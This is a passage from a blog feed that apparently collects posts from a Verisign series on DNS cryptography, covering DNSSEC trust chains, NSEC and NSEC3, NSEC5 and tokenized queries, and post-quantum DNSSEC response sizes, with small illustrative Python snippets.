  2. Cryptographic Tools for Non-Existence in the Domain Name System: NSEC and NSEC3
  3. Newer Cryptographic Advances for the Domain Name System: NSEC5 and Tokenized Queries
  4. Securing the DNS in a Post-Quantum World: New DNSSEC Algorithms on the Horizon
  5. Securing the DNS in a Post-Quantum World: Hash-Based Signatures and Synthesized Zone Signing Keys
  6. Information Protection for the Domain Name System: Encryption and Minimization

The post Securing the DNS in a Post-Quantum World: Hash-Based Signatures and Synthesized Zone Signing Keys appeared first on Verisign Blog.

Securing the DNS in a Post-Quantum World: New DNSSEC Algorithms on the Horizon

By Burt Kaliski

This is the fourth in a multi-part series on cryptography and the Domain Name System (DNS).

One of the “key” questions cryptographers have been asking for the past decade or more is what to do about the potential future development of a large-scale quantum computer.

If theory holds, a quantum computer could break established public-key algorithms including RSA and elliptic curve cryptography (ECC), building on Peter Shor’s groundbreaking result from 1994.

This prospect has motivated research into new so-called “post-quantum” algorithms that are less vulnerable to quantum computing advances. These algorithms, once standardized, may well be added into the Domain Name System Security Extensions (DNSSEC) — thus also adding another dimension to a cryptographer’s perspective on the DNS.

(Caveat: Once again, the concepts I’m discussing in this post are topics we’re studying in our long-term research program as we evaluate potential future applications of technology. They do not necessarily represent Verisign’s plans or position on possible new products or services.)

Post-Quantum Algorithms

The National Institute of Standards and Technology (NIST) started a Post-Quantum Cryptography project in 2016 to “specify one or more additional unclassified, publicly disclosed digital signature, public-key encryption, and key-establishment algorithms that are capable of protecting sensitive government information well into the foreseeable future, including after the advent of quantum computers.”

Security protocols that NIST is targeting for these algorithms, according to its 2019 status report (Section 2.2.1), include: “Transport Layer Security (TLS), Secure Shell (SSH), Internet Key Exchange (IKE), Internet Protocol Security (IPsec), and Domain Name System Security Extensions (DNSSEC).”

The project is now in its third round, with seven finalists (three of them digital signature algorithms) and eight alternates.

NIST’s project timeline anticipates that the draft standards for the new post-quantum algorithms will be available between 2022 and 2024.

It will likely take several additional years for standards bodies such as the Internet Engineering Task Force (IETF) to incorporate the new algorithms into security protocols. Broad deployments of the upgraded protocols will likely take several years more.

Post-quantum algorithms can therefore be considered a long-term issue, not a near-term one. However, as with other long-term research, it’s appropriate to draw attention to factors that need to be taken into account well ahead of time.

DNSSEC Operational Considerations

The three candidate digital signature algorithms in NIST’s third round have one common characteristic: all of them have a key size or signature size (or both) that is much larger than for current algorithms.

Key and signature sizes are important operational considerations for DNSSEC because most of the DNS traffic exchanged with authoritative name servers is sent and received via the User Datagram Protocol (UDP), which has a limited response size.

Response size concerns were evident during the expansion of the root zone signing key (ZSK) from 1024-bit to 2048-bit RSA in 2016, and in the rollover of the root key signing key (KSK) in 2018. In the latter case, although the signature and key sizes didn’t change, total response size was still an issue because responses during the rollover sometimes carried as many as four keys rather than the usual two.

Thanks to careful design and implementation, response sizes during these transitions generally stayed within typical UDP limits. Equally important, response sizes also appeared to have stayed within the Maximum Transmission Unit (MTU) of most networks involved, thereby also avoiding the risk of packet fragmentation. (You can check how well your network handles various DNSSEC response sizes with this tool developed by Verisign Labs.)
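For readers who want to observe these sizes directly, here is a small probe written against the third-party dnspython package (an assumption; any DNS library with EDNS support would do). It requests the root DNSKEY record set with the “DNSSEC OK” bit set and reports the wire size of the response.

```python
# Probe DNSSEC response sizes over UDP using dnspython (pip install dnspython).
import dns.flags
import dns.message
import dns.query
import dns.rdatatype

query = dns.message.make_query(".", dns.rdatatype.DNSKEY, want_dnssec=True)
query.use_edns(edns=0, payload=1232)  # advertise a conservative UDP buffer size

# 198.41.0.4 is a.root-servers.net, one of the root servers operated by Verisign.
response = dns.query.udp(query, "198.41.0.4", timeout=5)
print(f"response size: {len(response.to_wire())} bytes")
print(f"truncated (TCP retry needed): {bool(response.flags & dns.flags.TC)}")
```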

Modeling Assumptions

The larger sizes associated with certain post-quantum algorithms do not appear to be a significant issue either for TLS, according to one benchmarking study, or for public-key infrastructures, according to another report. However, a recently published study of post-quantum algorithms and DNSSEC observes that “DNSSEC is particularly challenging to transition” to the new algorithms.

Verisign Labs offers the following observations about DNSSEC-related queries that may help researchers to model DNSSEC impact:

A typical resolver that implements both DNSSEC validation and qname minimization will send a combination of queries to Verisign’s root and top-level domain (TLD) servers.

Because the resolver is a validating resolver, these queries will all have the “DNSSEC OK” bit set, indicating that the resolver wants the DNSSEC signatures on the records.

The content of typical responses by Verisign’s root and TLD servers to these queries is given in Table 1 below. (In the table, <SLD>.<TLD> are the final two labels of a domain name of interest, including the TLD and the second-level domain (SLD); record types involved include A, Name Server (NS), and DNSKEY.)

Root server responses, by resolver query scenario:

  DNSKEY record set for root zone:
  • DNSKEY record set including root KSK RSA-2048 public key and root ZSK RSA-2048 public key
  • Root KSK RSA-2048 signature on DNSKEY record set

  A or NS record set for <TLD> — when <TLD> exists:
  • NS referral to <TLD> name server
  • DS record set for <TLD> zone
  • Root ZSK RSA-2048 signature on DS record set

  A or NS record set for <TLD> — when <TLD> doesn’t exist:
  • Up to two NSEC records for non-existence of <TLD>
  • Root ZSK RSA-2048 signatures on NSEC records

.com / .net TLD server responses, by resolver query scenario:

  DNSKEY record set for <TLD> zone:
  • DNSKEY record set including <TLD> KSK RSA-2048 public key and <TLD> ZSK RSA-1280 public key
  • <TLD> KSK RSA-2048 signature on DNSKEY record set

  A or NS record set for <SLD>.<TLD> — when <SLD>.<TLD> exists:
  • NS referral to <SLD>.<TLD> name server
  • DS record set for <SLD>.<TLD> zone (if <SLD>.<TLD> supports DNSSEC)
  • <TLD> ZSK RSA-1280 signature on DS record set (if present)

  A or NS record set for <SLD>.<TLD> — when <SLD>.<TLD> doesn’t exist:
  • Up to three NSEC3 records for non-existence of <SLD>.<TLD>
  • <TLD> ZSK RSA-1280 signatures on NSEC3 records

Table 1. Combination of queries that may be sent to Verisign’s root and TLD servers by a typical resolver that implements both DNSSEC validation and qname minimization, and the content of the associated responses.


For an A or NS query, the typical response, when the domain of interest exists, includes a referral to another name server. If the domain supports DNSSEC, the response also includes a set of Delegation Signer (DS) records providing the hashes of each of the referred zone’s KSKs — the next link in the DNSSEC trust chain. When the domain of interest doesn’t exist, the response includes one or more Next Secure (NSEC) or Next Secure 3 (NSEC3) records.

Researchers can estimate the effect of post-quantum algorithms on response size by replacing the sizes of the various RSA keys and signatures with those for their post-quantum counterparts. As discussed above, it is important to keep in mind that the number of keys returned may be larger during key rollovers.

Most of the queries from qname-minimizing, validating resolvers to the root and TLD name servers will be for A or NS records (the choice depends on the implementation of qname minimization, and has recently trended toward A). The signature size for a post-quantum algorithm, which affects all DNSSEC-related responses, will therefore generally have a much larger impact on average response size than will the key size, which affects only the DNSKEY responses.
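As a first-order illustration of this modeling approach, the sketch below substitutes signature sizes into an assumed referral response. The 700-byte unsigned baseline is an assumption for illustration, and the post-quantum sizes (roughly 666 bytes for a Falcon-512 signature and 2,420 bytes for a Dilithium2 signature, per their public specifications) are approximate.

```python
# First-order effect of signature size alone on a signed referral response.
# All byte counts are illustrative assumptions, not measurements.
BASE_REFERRAL = 700  # assumed unsigned portion: NS records, DS set, glue
SIG_SIZES = {
    "RSA-2048 (current root ZSK)": 256,
    "Falcon-512 (approx.)": 666,
    "Dilithium2 (approx.)": 2420,
}

for alg, sig_bytes in SIG_SIZES.items():
    total = BASE_REFERRAL + sig_bytes  # one ZSK signature on the DS record set
    verdict = "fits" if total <= 1232 else "exceeds"
    print(f"{alg:<28} -> ~{total} bytes ({verdict} a 1232-byte UDP payload)")
```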

Conclusion

Post-quantum algorithms are among the newest developments in cryptography. They add another dimension to a cryptographer’s perspective on the DNS because of the possibility that these algorithms, or other variants, may be added to DNSSEC in the long term.

In my next post, I’ll make the case for why the oldest post-quantum algorithm, hash-based signatures, could be a particularly good match for DNSSEC. I’ll also share the results of some research at Verisign Labs into how the large signature sizes of hash-based signatures could potentially be overcome.

Read the complete six blog series:

  1. The Domain Name System: A Cryptographer’s Perspective
  2. Cryptographic Tools for Non-Existence in the Domain Name System: NSEC and NSEC3
  3. Newer Cryptographic Advances for the Domain Name System: NSEC5 and Tokenized Queries
  4. Securing the DNS in a Post-Quantum World: New DNSSEC Algorithms on the Horizon
  5. Securing the DNS in a Post-Quantum World: Hash-Based Signatures and Synthesized Zone Signing Keys
  6. Information Protection for the Domain Name System: Encryption and Minimization

The post Securing the DNS in a Post-Quantum World: New DNSSEC Algorithms on the Horizon appeared first on Verisign Blog.

Newer Cryptographic Advances for the Domain Name System: NSEC5 and Tokenized Queries

By Burt Kaliski

This is the third in a multi-part blog series on cryptography and the Domain Name System (DNS).

In my last post, I looked at what happens when a DNS query renders a “negative” response – i.e., when a domain name doesn’t exist. I then examined two cryptographic approaches to handling negative responses: NSEC and NSEC3. In this post, I will examine a third approach, NSEC5, and a related concept that protects client information, tokenized queries.

The concepts I discuss below are topics we’ve studied in our long-term research program as we evaluate new technologies. They do not necessarily represent Verisign’s plans or position on a new product or service. Concepts developed in our research program may be subject to U.S. and international patents and patent applications.

NSEC5

NSEC5 is a result of research by cryptographers at Boston University and the Weizmann Institute. In this approach, which is still in an experimental stage, the endpoints are the outputs of a verifiable random function (VRF), a cryptographic primitive that has been gaining interest in recent years. NSEC5 is documented in an Internet Draft (currently expired) and in several research papers.

A VRF is like a hash function but with two important differences:

  1. In addition to a message input, a VRF has a second input, a private key. (As in public-key cryptography, there’s also a corresponding public key.) No one can compute the outputs without the private key, hence the “random.”
  2. A VRF has two outputs: a token and a proof. (I’ve adopted the term “token” for alignment with the research that I describe next. NSEC5 itself simply uses “hash.”) Anyone can check that the token is correct given the proof and the public key, hence the “verifiable.”

So, it’s not only hard for an adversary to reverse the VRF – which is also a property the hash function has – but it’s also hard for the adversary to compute the VRF in the forward direction, thus preventing dictionary attacks. And yet a relying party can still confirm that the VRF output for a given input is correct, because of the proof.
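To make the token/proof interface concrete, here is a toy sketch in the RSA full-domain-hash style that NSEC5 builds on: the proof is a deterministic RSA signature on the hashed name, and the token is a hash of that proof. The tiny hardcoded primes make this insecure; it illustrates the interface, not a production construction.

```python
# Toy RSA-FDH-style VRF: proof = RSA signature on the hashed name;
# token = hash of the proof. Tiny primes -- insecure, illustration only.
import hashlib

p, q, e = 1_000_003, 1_000_033, 65_537   # toy key; real keys are 2048+ bits
n = p * q
d = pow(e, -1, (p - 1) * (q - 1))        # private exponent

def fdh(name: bytes) -> int:
    # "Full-domain" hash of the name into Z_n (truncated; toy only).
    return int.from_bytes(hashlib.sha256(name).digest(), "big") % n

def vrf_eval(name: bytes):
    proof = pow(fdh(name), d, n)  # requires the private key
    token = hashlib.sha256(proof.to_bytes(16, "big")).hexdigest()[:8]
    return token, proof

def vrf_verify(name: bytes, token: str, proof: int) -> bool:
    # Anyone holding the public key (n, e) can check the token.
    if pow(proof, e, n) != fdh(name):
        return False
    return token == hashlib.sha256(proof.to_bytes(16, "big")).hexdigest()[:8]

token, proof = vrf_eval(b"example.name.")
assert vrf_verify(b"example.name.", token, proof)
```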

How does this work in practice? As in NSEC and NSEC3, range statements are prepared in advance and signed with the zone signing key (ZSK). With NSEC5, however, the range endpoints are two consecutive tokens.

When a domain name doesn’t exist, the name server applies the VRF to the domain name to obtain a token and a proof. The name server then returns a range statement where the token falls within the range, as well as the proof, as shown in the figure below. Note that the token values are for illustration only.

Figure 1. An example of an NSEC5 proof of non-existence based on a verifiable random function.

Because the range statement reveals only tokenized versions of other domain names in a zone, an adversary who doesn’t know the private key doesn’t learn any new existing domain names from the response. Indeed, to find out which domain name corresponds to one of the tokenized endpoints, the adversary would need access to the VRF itself to see if a candidate domain name has a matching hash value, which would involve an online dictionary attack. This significantly reduces disclosure risk.

The name server needs a copy of the zone’s NSEC5 private key so that it can generate proofs for non-existent domain names. The ZSK itself can stay in the provisioning system. As the designers of NSEC5 have pointed out, if the NSEC5 private key does happen to be compromised, this only makes it possible to do a dictionary attack offline — not to generate signatures on new range statements, or on new positive responses.

NSEC5 is interesting from a cryptographer’s perspective because it uses a less common cryptographic technique, a VRF, to achieve a design goal that was at best partially met by previous approaches. As with other new technologies, DNS operators will need to consider whether NSEC5’s benefits are sufficient to justify its cost and complexity. Verisign doesn’t have any plans to implement NSEC5, as we consider NSEC and NSEC3 adequate for the name servers we currently operate. However, we will continue to track NSEC5 and related developments as part of our long-term research program.

Tokenized Queries

A few years before NSEC5 was published, Verisign Labs had started some research on an opposite application of tokenization to the DNS, to protect a client’s information from disclosure.

In our approach, instead of asking the resolver “What is <name>’s IP address,” the client would ask “What is token 3141…’s IP address,” where 3141… is the tokenization of <name>.

(More precisely, the client would specify both the token and the parent zone that the token relates to, e.g., the TLD of the domain name. Only the portion of the domain name below the parent would be obscured, just as in NSEC5. I’ve omitted the zone information for simplicity in this discussion.)

Suppose now that the domain name corresponding to token 3141… does exist. Then the resolver would respond with the domain name’s IP address as usual, as shown in the next figure.

Figure 2. Tokenized queries.

In this case, the resolver would know that the domain name associated with the token does exist, because it would have a mapping between the token and the DNS record, i.e., the IP address. Thus, the resolver would effectively “know” the domain name as well for practical purposes. (We’ve developed another approach that can protect both the domain name and the DNS record from disclosure to the resolver in this case, but that’s perhaps a topic for another post.)

Now, consider a domain name that doesn’t exist and suppose that its token is 2718… .

In this case, the resolver would respond that the domain name doesn’t exist, as usual, as shown below.

Figure 3. Non-existence with tokenized queries.

But because the domain name is tokenized and no other information about the domain name is returned, the resolver would only learn the token 2718… (and the parent zone), not the actual domain name that the client is interested in.

The resolver could potentially know that the name doesn’t exist via a range statement from the parent zone, as in NSEC5.

How does the client tokenize the domain name, if it doesn’t have the private key for the VRF? The name server would offer a public interface to the tokenization function. This can be done in what cryptographers call an “oblivious” VRF protocol, where the name server doesn’t see the actual domain name during the protocol, yet the client still gets the token.
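As a concept sketch only (not the specific protocol described in the patent cited below), here is how classical RSA blinding can make an evaluation of this kind “oblivious”: the client blinds the hashed name before sending it, so the server applies its private key without ever seeing the name. This reuses the same toy key parameters as the earlier NSEC5 snippet.

```python
# Oblivious evaluation via RSA blinding: the server never sees fdh(name).
# Same toy key as the earlier NSEC5 sketch; insecure, illustration only.
import hashlib
import secrets

p, q, e = 1_000_003, 1_000_033, 65_537
n = p * q
d = pow(e, -1, (p - 1) * (q - 1))

def fdh(name: bytes) -> int:
    return int.from_bytes(hashlib.sha256(name).digest(), "big") % n

def client_blind(name: bytes):
    r = secrets.randbelow(n - 2) + 2        # blinding factor (assumed coprime to n)
    return fdh(name) * pow(r, e, n) % n, r  # server sees only fdh(name) * r^e

def server_evaluate(blinded: int) -> int:
    return pow(blinded, d, n)               # (fdh * r^e)^d = fdh^d * r (mod n)

def client_unblind(result: int, r: int) -> int:
    return result * pow(r, -1, n) % n       # strip the blinding; recover fdh^d

blinded, r = client_blind(b"secret.example.")
proof = client_unblind(server_evaluate(blinded), r)
assert pow(proof, e, n) == fdh(b"secret.example.")  # valid proof, name unseen
```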

To keep the resolver itself from using this interface to do an online dictionary attack that matches candidate domain names with tokens, the name server could rate-limit access, or restrict it only to authorized requesters.

Additional details on this technology may be found in U.S. Patent 9,202,079B2, entitled “Privacy preserving data querying,” and related patents.

It’s interesting from a cryptographer’s perspective that there’s a way for a client to find out whether a DNS record exists, without necessarily revealing the domain name of interest. However, as before, the benefits of this new technology will be weighed against its operational cost and complexity and compared to other approaches. Because this technique focuses on client-to-resolver interactions, it’s already one step removed from the name servers that Verisign currently operates, so it is not as relevant to our business today as it might have been when we started the research. This one will stay under our long-term tracking as well.

Conclusion

The examples I’ve shared in these last two blog posts make it clear that cryptography has the potential to bring interesting new capabilities to the DNS. While the particular examples I’ve shared here do not meet the criteria for our product roadmap, researching advances in cryptography and other techniques remains important because new events can sometimes change the calculus. That point will become even more evident in my next post, where I’ll consider the kinds of cryptography that may be needed in the event that one or more of today’s algorithms is compromised, possibly through the introduction of a quantum computer.

Read the complete six blog series:

  1. The Domain Name System: A Cryptographer’s Perspective
  2. Cryptographic Tools for Non-Existence in the Domain Name System: NSEC and NSEC3
  3. Newer Cryptographic Advances for the Domain Name System: NSEC5 and Tokenized Queries
  4. Securing the DNS in a Post-Quantum World: New DNSSEC Algorithms on the Horizon
  5. Securing the DNS in a Post-Quantum World: Hash-Based Signatures and Synthesized Zone Signing Keys
  6. Information Protection for the Domain Name System: Encryption and Minimization

The post Newer Cryptographic Advances for the Domain Name System: NSEC5 and Tokenized Queries appeared first on Verisign Blog.

Cryptographic Tools for Non-Existence in the Domain Name System: NSEC and NSEC3

By Burt Kaliski

This is the second in a multi-part blog series on cryptography and the Domain Name System (DNS).

In my previous post, I described the first broad scale deployment of cryptography in the DNS, known as the Domain Name System Security Extensions (DNSSEC). I described how a name server can enable a requester to validate the correctness of a “positive” response to a query — when a queried domain name exists — by adding a digital signature to the DNS response returned.

The designers of DNSSEC, as well as academic researchers, have separately considered the case of “negative” responses – when the queried domain name doesn’t exist. In this case, as I’ll explain, simply returning a signed “does not exist” statement is not the best design. This makes the non-existence case interesting from a cryptographer’s perspective as well.

Initial Attempts

Consider a domain name like example.arpa that doesn’t exist.

If it did exist, then as I described in my previous post, the second-level domain (SLD) server for example.arpa would return a response signed by example.arpa’s zone signing key (ZSK).

So a first try for the case that the domain name doesn’t exist is for the SLD server to return the response “example.arpa doesn’t exist,” signed by example.arpa’s ZSK.

However, if example.arpa doesn’t exist, then example.arpa won’t have either an SLD server or a ZSK to sign with. So, this approach won’t work.

A second try is for the parent name server — the .arpa top-level domain (TLD) server in the example — to return the response “example.arpa doesn’t exist,” signed by the parent’s ZSK.

This could work if the .arpa DNS server knows the ZSK for .arpa. However, for security and performance reasons, the design preference for DNSSEC has been to keep private keys offline, within the zone’s provisioning system.

The provisioning system can precompute statements about domain names that do exist — but not about every possible individual domain name that doesn’t exist. So, this won’t work either, at least not for the servers that keep their private keys offline.

The third try is the design that DNSSEC settled on. The parent name server returns a “range statement,” previously signed with the ZSK, that states that there are no domain names in an ordered sequence between two “endpoints” where the endpoints depend on domain names that do exist. The range statements can therefore be signed offline, and yet the name server can still choose an appropriate signed response to return, based on the (non-existent) domain name in the query.

The DNS community has considered several approaches to constructing range statements, and they have varying cryptographic properties. Below I’ve described two such approaches. For simplicity, I’ve focused just on the basics in the discussion that follows. The astute reader will recognize that there are many more details involved both in the specification and the implementation of these techniques.

NSEC

The first approach, called NSEC, involved no additional cryptography beyond the DNSSEC signature on the range statement. In NSEC, the endpoints are actual domain names that exist. NSEC stands for “Next Secure,” referring to the fact that the second endpoint in the range is the “next” existing domain name following the first endpoint.

The NSEC resource record is documented in one of the original DNSSEC specifications, RFC 4034, which was co-authored by Verisign.

The .arpa zone implements NSEC. When the .arpa server receives the request “What is the IP address of example.arpa,” it returns the response “There are no names between e164.arpa and home.arpa.” This exchange is shown in the figure below and is analyzed in the associated DNSviz graph. (The response is accurate as of the writing of this post; it could be different in the future if names were added to or removed from the .arpa zone.)
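Here is a sketch of how a name server might select the covering range statement for a non-existent name, using plain lexicographic ordering for brevity (actual DNSSEC uses canonical DNS name ordering, which differs in detail; the zone contents below are illustrative).

```python
# Choosing the precomputed NSEC range that covers a non-existent name.
# Simple lexicographic order stands in for canonical DNS ordering.
import bisect

existing = sorted(["arpa.", "e164.arpa.", "home.arpa.", "in-addr.arpa.",
                   "ip6.arpa.", "uri.arpa.", "urn.arpa."])

def covering_range(qname: str):
    i = bisect.bisect_left(existing, qname)
    if i < len(existing) and existing[i] == qname:
        return None  # the name exists: send a signed positive response instead
    prev = existing[i - 1] if i > 0 else existing[-1]  # wrap around the zone
    nxt = existing[i] if i < len(existing) else existing[0]
    return prev, nxt  # endpoints of the presigned NSEC range statement

print(covering_range("example.arpa."))  # ('e164.arpa.', 'home.arpa.')
```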

NSEC has a side effect: responses immediately reveal unqueried domain names in the zone. Depending on the sensitivity of the zone, this may be undesirable from the perspective of the minimum disclosure principle.

Figure 1. An example of an NSEC proof of non-existence (as of the writing of this post).

NSEC3

A second approach, called NSEC3, reduces the disclosure risk somewhat by defining the endpoints as hashes of existing domain names. (NSEC3 is documented in RFC 5155, which was also co-authored by Verisign.)

An example of NSEC3 can be seen with example.name, another domain that doesn’t exist. Here, the .name TLD server returns a range statement saying “There are no domain names with hashes between 5SU9… and 5T48…”. Because the hash of example.name is “5SVV…”, the response implies that example.name doesn’t exist.

This statement is shown in the figure below and in another DNSviz graph. (As above, the actual response could change if the .name zone changes.)

Figure 2. An example of an NSEC3 proof of non-existence based on a hash function (as of the writing of this post).

To find out which domain name corresponds to one of the hashed endpoints, an adversary would have to do a trial-and-error or “dictionary” attack across multiple guesses of domain names, to see if any has a matching hash value. Such a search could be performed “offline,” i.e., without further interaction with the name server, which is why the disclosure risk is only somewhat reduced.
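For the curious, here is a simplified sketch of how the hashed endpoints are computed under RFC 5155: SHA-1 over the wire-format name concatenated with a salt, iterated, then encoded in Base32 with the extended hex alphabet. The salt and iteration count below are placeholders; a real zone publishes its own in its NSEC3PARAM record.

```python
# Simplified NSEC3 ownername hash (RFC 5155). Placeholder salt/iterations.
import base64
import hashlib

B32_STD = "ABCDEFGHIJKLMNOPQRSTUVWXYZ234567"
B32_HEX = "0123456789ABCDEFGHIJKLMNOPQRSTUV"
TO_HEX = str.maketrans(B32_STD, B32_HEX)

def wire_name(name: str) -> bytes:
    # Canonical form: lowercase labels, each prefixed by its length,
    # terminated by the zero-length root label.
    out = b""
    for label in name.rstrip(".").lower().split("."):
        out += bytes([len(label)]) + label.encode()
    return out + b"\x00"

def nsec3_hash(name: str, salt: bytes = b"", iterations: int = 0) -> str:
    digest = hashlib.sha1(wire_name(name) + salt).digest()
    for _ in range(iterations):
        digest = hashlib.sha1(digest + salt).digest()
    return base64.b32encode(digest).decode().translate(TO_HEX)

print(nsec3_hash("example.name."))  # the value a dictionary attack would test
```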

NSEC and NSEC3 are mutually exclusive. Nearly all TLDs, including all TLDs operated by Verisign, implement NSEC3. In addition to .arpa, the root zone also implements NSEC.

In my next post, I’ll describe NSEC5, an approach still in the experimental stage, that replaces the hash function in NSEC3 with a verifiable random function (VRF) to protect against offline dictionary attacks. I’ll also share some research Verisign Labs has done on a complementary approach that helps protect a client’s queries for non-existent domain names from disclosure.

Read the complete six blog series:

  1. The Domain Name System: A Cryptographer’s Perspective
  2. Cryptographic Tools for Non-Existence in the Domain Name System: NSEC and NSEC3
  3. Newer Cryptographic Advances for the Domain Name System: NSEC5 and Tokenized Queries
  4. Securing the DNS in a Post-Quantum World: New DNSSEC Algorithms on the Horizon
  5. Securing the DNS in a Post-Quantum World: Hash-Based Signatures and Synthesized Zone Signing Keys
  6. Information Protection for the Domain Name System: Encryption and Minimization

The post Cryptographic Tools for Non-Existence in the Domain Name System: NSEC and NSEC3 appeared first on Verisign Blog.

The Domain Name System: A Cryptographer’s Perspective

By Burt Kaliski

This is the first in a multi-part blog series on cryptography and the Domain Name System (DNS).

As one of the earliest protocols in the internet, the DNS emerged in an era in which today’s global network was still an experiment. Security was not a primary consideration then, and the design of the DNS, like other parts of the internet of the day, did not have cryptography built in.

Today, cryptography is part of almost every protocol, including the DNS. And from a cryptographer’s perspective, as I described in my talk at last year’s International Cryptographic Module Conference (ICMC20), there’s so much more to the story than just encryption.

Where It All Began: DNSSEC

The first broad-scale deployment of cryptography in the DNS was not for confidentiality but for data integrity, through the Domain Name System Security Extensions (DNSSEC), introduced in 2005.

The story begins with the usual occurrence that happens millions of times a second around the world: a client asks a DNS resolver a query like “What is example.com’s Internet Protocol (IP) address?” The resolver in this case answers: “example.com’s IP address is 93.184.216.34”. (This is the correct answer.)

If the resolver doesn’t already know the answer to the request, then the process to find the answer goes something like this:

  • With qname minimization, when the resolver receives this request, it starts by asking a related question to one of the DNS’s 13 root servers, such as the A and J root servers operated by Verisign: “Where is the name server for the .com top-level domain (TLD)?”
  • The root server refers the resolver to the .com TLD server.
  • The resolver asks the TLD server, “Where is the name server for the example.com second-level domain (SLD)?”
  • The TLD server then refers the resolver to the example.com server.
  • Finally, the resolver asks the SLD server, “What is example.com’s IP address?” and receives an answer: “93.184.216.34”.
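To see the end result of such a walk in practice, here is a short sketch assuming the third-party dnspython package; it asks a public validating resolver (8.8.8.8 is used here purely as an example) for example.com’s A record with the “DNSSEC OK” bit set, so the signatures come back alongside the answer.

```python
# Request an answer together with its DNSSEC signatures, using dnspython.
import dns.message
import dns.query
import dns.rdatatype

query = dns.message.make_query("example.com.", dns.rdatatype.A,
                               want_dnssec=True)
response = dns.query.udp(query, "8.8.8.8", timeout=5)

for rrset in response.answer:
    print(rrset)  # prints the A record set and its RRSIG record set
```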

Digital Signatures

But how does the resolver know that the answer it ultimately receives is correct? The process defined by DNSSEC follows the same “delegation” model from root to TLD to SLD as I’ve described above.

Indeed, DNSSEC provides a way for the resolver to check that the answer is correct by validating a chain of digital signatures, one at each level of the DNS hierarchy (or technically, at each “zone” in the delegation process). These digital signatures are generated using public-key cryptography, a well-understood process based on key pairs, one public and one private.

In a typical DNSSEC deployment, there are two active public keys per zone: a Key Signing Key (KSK) public key and a Zone Signing Key (ZSK) public key. (The reason for having two keys is so that one key can be changed locally, without the other key being changed.)

The responses returned to the resolver include digital signatures generated by either the corresponding KSK private key or the corresponding ZSK private key.

Using mathematical operations, the resolver checks all the digital signatures it receives in association with a given query. If they are valid, the resolver signals to the client that initiated the query that the records have been validated (in practice, by setting the Authenticated Data flag in its response).

Trust Chains

Figure 1: A Simplified View of the DNSSEC Chain.

A convenient way to visualize the collection of digital signatures is as a “trust chain” from a “trust anchor” to the DNS record of interest, as shown in the figure above. The chain includes “chain links” at each level of the DNS hierarchy. Here’s how the “chain links” work:

The root KSK public key is the “trust anchor.” This key is widely distributed in resolvers so that they can independently authenticate digital signatures on records in the root zone, and thus authenticate everything else in the chain.

The root zone chain links consist of three parts:

  1. The root KSK public key is published as a DNS record in the root zone. It must match the trust anchor.
  2. The root ZSK public key is also published as a DNS record. It is signed by the root KSK private key, thus linking the two keys together.
  3. The hash of the TLD KSK public key is published as a DNS record. It is signed by the root ZSK private key, further extending the chain.

The TLD zone chain links also consist of three parts:

  1. The TLD KSK public key is published as a DNS record; its hash must match the hash published in the root zone.
  2. The TLD ZSK public key is published as a DNS record, which is signed by the TLD KSK private key.
  3. The hash of the SLD KSK public key is published as a DNS record. It is signed by the TLD ZSK private key.

The SLD zone chain links once more consist of three parts:

  1. The SLD KSK public key is published as a DNS record. Its hash, as expected, must match the hash published in the TLD zone.
  2. The SLD ZSK public key is published as a DNS record signed by the SLD KSK private key.
  3. A set of DNS records – the ultimate response to the query – is signed by the SLD ZSK private key.

A resolver (or anyone else) can thereby verify the signature on any set of DNS records given the chain of public keys leading up to the trust anchor.
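To make the chain mechanics concrete, here is a toy end-to-end version, assuming the third-party cryptography package and substituting Ed25519 for the production algorithms; the DS link is modeled as a SHA-256 hash of the child KSK public key. This is a conceptual sketch, not how resolvers are actually implemented.

```python
# Toy DNSSEC-style trust chain (pip install cryptography). Illustration only.
import hashlib
from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.primitives.asymmetric import ed25519

def raw(pub):
    # Raw public key bytes, standing in for a DNSKEY record's key field.
    return pub.public_bytes(serialization.Encoding.Raw,
                            serialization.PublicFormat.Raw)

# One KSK and one ZSK per zone.
keys = {zone: {"ksk": ed25519.Ed25519PrivateKey.generate(),
               "zsk": ed25519.Ed25519PrivateKey.generate()}
        for zone in ("root", "com", "example.com")}

# Within each zone, the KSK signs the ZSK public key.
zsk_sig = {zone: k["ksk"].sign(raw(k["zsk"].public_key()))
           for zone, k in keys.items()}

# Each parent publishes a hash of the child's KSK (the "DS" link),
# signed by the parent's ZSK.
ds = {zone: hashlib.sha256(raw(keys[zone]["ksk"].public_key())).digest()
      for zone in ("com", "example.com")}
ds_sig = {"com": keys["root"]["zsk"].sign(ds["com"]),
          "example.com": keys["com"]["zsk"].sign(ds["example.com"])}

# The SLD's ZSK signs the final record set.
record = b"example.com. A 93.184.216.34"
record_sig = keys["example.com"]["zsk"].sign(record)

# Resolver side: walk from the trust anchor (root KSK public key) down to
# the record; verify() raises if any link is broken. (A real resolver would
# also hash the received child KSK and compare it to the signed DS value.)
trust_anchor = keys["root"]["ksk"].public_key()
trust_anchor.verify(zsk_sig["root"], raw(keys["root"]["zsk"].public_key()))
keys["root"]["zsk"].public_key().verify(ds_sig["com"], ds["com"])
keys["com"]["ksk"].public_key().verify(zsk_sig["com"],
                                       raw(keys["com"]["zsk"].public_key()))
keys["com"]["zsk"].public_key().verify(ds_sig["example.com"],
                                       ds["example.com"])
keys["example.com"]["ksk"].public_key().verify(
    zsk_sig["example.com"], raw(keys["example.com"]["zsk"].public_key()))
keys["example.com"]["zsk"].public_key().verify(record_sig, record)
print("trust chain validated")
```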

Note that this is a simplified view, and there are other details in practice. For instance, the various KSK public keys are also signed by their own private KSK, but I’ve omitted these signatures for brevity. The DNSViz tool provides a very nice interactive interface for browsing DNSSEC trust chains in detail, including the trust chain for example.com discussed here.

Updating the Root KSK Public Key

The effort to update the root KSK public key, the aforementioned “trust anchor,” was one of the most challenging and ultimately successful projects undertaken by the DNS community in recent years. This initiative – the so-called “root KSK rollover” – was challenging because there was no easy way to determine whether resolvers had actually been updated to use the latest root KSK — remember that cryptography and security were added onto the DNS rather than built in. There were many resolvers that needed to be updated, each independently managed.

The research paper “Roll, Roll, Roll your Root: A Comprehensive Analysis of the First Ever DNSSEC Root KSK Rollover” details the process of updating the root KSK. The paper, co-authored by Verisign researchers and external colleagues, received the distinguished paper award at the 2019 Internet Measurement Conference.

Final Thoughts

I’ve focused here on how a resolver validates correctness when the response to a query has a “positive” answer — i.e., when the DNS record exists. Checking correctness when the answer doesn’t exist gets even more interesting from a cryptographer’s perspective. I’ll cover this topic in my next post.

Read the complete six blog series:

  1. The Domain Name System: A Cryptographer’s Perspective
  2. Cryptographic Tools for Non-Existence in the Domain Name System: NSEC and NSEC3
